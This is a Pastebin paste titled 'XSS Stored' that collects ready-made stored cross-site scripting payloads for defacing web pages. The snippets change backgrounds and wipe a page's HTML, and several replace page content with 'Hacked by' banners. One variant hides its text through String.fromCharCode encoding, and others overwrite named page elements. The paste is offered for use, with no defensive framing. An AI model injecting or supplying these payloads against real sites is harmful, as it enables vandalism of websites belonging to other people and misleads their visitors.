API tools faq
paste
Advertisement
afrizalwahyuadi66

XSS Stored

afrizalwahyuadi66
Mar 31st, 2024 (edited)
1,002
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.76 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. {Change Background Color}
  2.  
  3. <body style="background-color:blue;">
  4. ____________________________________________________________________________________________________________________________
  5. ____________________________________________________________________________________________________________________________
  6. {Change Background Image}
  7.  
  8. <style>
  9. div {
  10. background-image: url('http://www.deepeddy.net/img/deepeddyfish.gif');
  11. }
  12. </style>
  13. ____________________________________________________________________________________________________________________________
  14. ____________________________________________________________________________________________________________________________
  15. {Blanking a Web Page}
  16.  
  17. Note: document.documentElement.innerHTML contains all HTML of a web page. Setting it to equal to an empty string ("") causes all HTML on that page to disappear.
  18.  
  19. <script>document.documentElement.innerHTML=""</script>
  20. ____________________________________________________________________________________________________________________________
  21. ____________________________________________________________________________________________________________________________
  22. {Defacing a Web Page by Injecting HTML Code}
  23. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  24. <script>document.documentElement.innerHTML="<html><h1>Hacked by saTaoz</h1>What do you think of me now?</html>"</script>
  25.  
  26. Alternate scripts:
  27.  
  28. <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED BY TED</h1></div>";</script>
  29.  
  30. <script>document.body.innerHTML="<h1>Hacked by saTaoz</h1>";</script>
  31. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  32. <script>document.documentElement.innerHTML=(String.fromCharCode(CharCode string goes here));</script>
  33. Example :
  34. <script>document.documentElement.innerHTML=(String.fromCharCode(72, 97, 99, 107, 101, 100, 32, 98, 121, 32, 115, 97, 84, 97, 111, 122));</script>
  35. ____________________________________________________________________________________________________________________________
  36. ____________________________________________________________________________________________________________________________
  37. {Defacing a Web Page by Modifying the DOM and Injecting HTML Code}
  38.  
  39. <script> document.getElementById("pageName").innerHTML = "Stay away from our page!<p><h4>You are where you do not belong.</h4></p>";</script>
  40.  
  41. Example :
  42. <script>document.getElementById("main_body").innerHTML = "<h1>Hacking is not a crime!</h1>";</script>
  43. ____________________________________________________________________________________________________________________________
  44.  
Tags: XSS Stored
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!